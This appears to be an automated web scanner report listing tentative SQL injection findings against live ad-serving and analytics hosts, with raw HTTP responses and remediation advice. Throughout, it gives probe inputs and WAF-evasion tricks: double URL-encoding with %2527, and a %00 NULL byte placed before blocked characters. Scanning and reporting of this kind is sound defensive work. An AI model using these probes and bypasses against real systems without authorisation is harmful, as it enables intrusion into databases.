SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The id cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6955 Set-Cookie: id=cdf63f63c000025||t=1317849187|et=730|cs=002213fd488b3b0c75b2fab850; path=/; domain=.doubleclick.net; expires=Fri, 04 Oct 2013 21:13:07 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 04 Oct 2011 21:13:07 GMT Date: Wed, 05 Oct 2011 21:13:07 GMT Expires: Wed, 05 Oct 2011 21:13:07 GMT Cache-Control: private
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 30 17:11:10 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}} else if (window.ActiveXObject && window.execScript){ window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal ...[SNIP]...
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 3794 Set-Cookie: id=c9d66f63c000077||t=1317849188|et=730|cs=002213fd48fcd9706c1e93c832; path=/; domain=.doubleclick.net; expires=Fri, 04 Oct 2013 21:13:08 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 04 Oct 2011 21:13:08 GMT Date: Wed, 05 Oct 2011 21:13:08 GMT Expires: Wed, 05 Oct 2011 21:13:08 GMT Cache-Control: private
document.write('\n<!-- Copyright DoubleClick Inc., All rights reserved. -->\n<!-- This code was autogenerated @ Thu Sep 22 02:47:00 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]...
1.2. http://ad.doubleclick.net/adj/interactive.wsj.com/blog_venturecapital [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://ad.doubleclick.net
Path:
/adj/interactive.wsj.com/blog_venturecapital
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 2045 Set-Cookie: id=c6565f63c0000b9||t=1317849164|et=730|cs=002213fd48dac6323075d6a244; path=/; domain=.doubleclick.net; expires=Fri, 04 Oct 2013 21:12:44 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 04 Oct 2011 21:12:44 GMT Date: Wed, 05 Oct 2011 21:12:43 GMT Expires: Wed, 05 Oct 2011 21:12:43 GMT Cache-Control: private
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 4112 Set-Cookie: id=c8a64f63c00007e||t=1317849165|et=730|cs=002213fd4848cb84b7b1758412; path=/; domain=.doubleclick.net; expires=Fri, 04 Oct 2013 21:12:45 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 04 Oct 2011 21:12:45 GMT Date: Wed, 05 Oct 2011 21:12:45 GMT Expires: Wed, 05 Oct 2011 21:12:45 GMT Cache-Control: private
document.write('\n<!-- Copyright DoubleClick Inc., All rights reserved. -->\n<!-- This code was autogenerated @ Tue Jun 21 03:25:12 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 404 Not Found Date: Wed, 05 Oct 2011 21:18:22 GMT Server: Omniture DC/2.0.0 Content-Length: 399 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The ReleaseDeliveryTime cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ReleaseDeliveryTime cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ReleaseDeliveryTime cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The ReleasePID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ReleasePID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ReleasePID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The exp_last_activity cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_last_activity cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the exp_last_activity cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The exp_last_visit cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_last_visit cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the exp_last_visit cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The exp_tracker cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_tracker cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The keywords parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the keywords parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The site_id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the site_id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The where parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the where parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the where request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://vindicoasset.edgesuite.net/Repository/CampaignCreative/Campaign_6618/BANNERCREATIVE/Suave_3 ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://vindicoasset.edgesuite.net/Repository/CampaignCreative/Campaign_6618/BANNERCREATIVE/Suave_3 ...[SNIP]...
The adRotationId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the adRotationId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
The bannerCreativeAdModuleId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the bannerCreativeAdModuleId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
The campaignId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the campaignId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
The siteId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the siteId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
The syndicationOutletId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the syndicationOutletId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
The sessionid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sessionid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the sessionid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The queryString parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the queryString parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 7, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 05 Oct 2011 20:50:14 GMT Connection: close X-xgen-cache: yes X-Cache-Info: not cacheable; response code not cacheable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[SNIP]... <br>
The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 8, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 05 Oct 2011 20:50:16 GMT Connection: close X-xgen-cache: yes X-Cache-Info: not cacheable; response code not cacheable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[SNIP]... <br>
The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 7, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 05 Oct 2011 20:50:10 GMT Connection: close X-xgen-cache: yes X-Cache-Info: not cacheable; response code not cacheable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[SNIP]... <br>
The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 8, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 05 Oct 2011 20:50:11 GMT Connection: close X-xgen-cache: yes X-Cache-Info: not cacheable; response code not cacheable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[SNIP]... <br>
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 7, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 05 Oct 2011 20:50:43 GMT Connection: close X-xgen-cache: yes X-Cache-Info: not cacheable; response code not cacheable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[SNIP]... <br>
The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 8, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 05 Oct 2011 20:50:44 GMT Connection: close X-xgen-cache: yes X-Cache-Info: not cacheable; response code not cacheable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[SNIP]... <br>
The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 7, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 05 Oct 2011 20:50:44 GMT Connection: close X-xgen-cache: yes X-Cache-Info: not cacheable; response code not cacheable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[SNIP]... <br>
The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 8, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 05 Oct 2011 20:50:46 GMT Connection: close X-xgen-cache: yes X-Cache-Info: not cacheable; response code not cacheable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[SNIP]... <br>
The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 7, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 05 Oct 2011 20:50:09 GMT Connection: close X-xgen-cache: yes X-Cache-Info: not cacheable; response code not cacheable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[SNIP]... <br>
The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 8, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 05 Oct 2011 20:50:10 GMT Connection: close X-xgen-cache: yes X-Cache-Info: not cacheable; response code not cacheable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[SNIP]... <br>
The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 7, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 05 Oct 2011 20:50:12 GMT Connection: close X-xgen-cache: yes X-Cache-Info: not cacheable; response code not cacheable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[SNIP]... <br>
The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 8, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 05 Oct 2011 20:50:13 GMT Connection: close X-xgen-cache: yes X-Cache-Info: not cacheable; response code not cacheable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[SNIP]... <br>
The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 7, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 05 Oct 2011 20:45:57 GMT Connection: close X-xgen-cache: yes X-Cache-Info: not cacheable; response code not cacheable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[SNIP]... <br>
The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 8, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 05 Oct 2011 20:45:59 GMT Connection: close X-xgen-cache: yes X-Cache-Info: not cacheable; response code not cacheable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF ...[SNIP]... <br>
The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 7, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
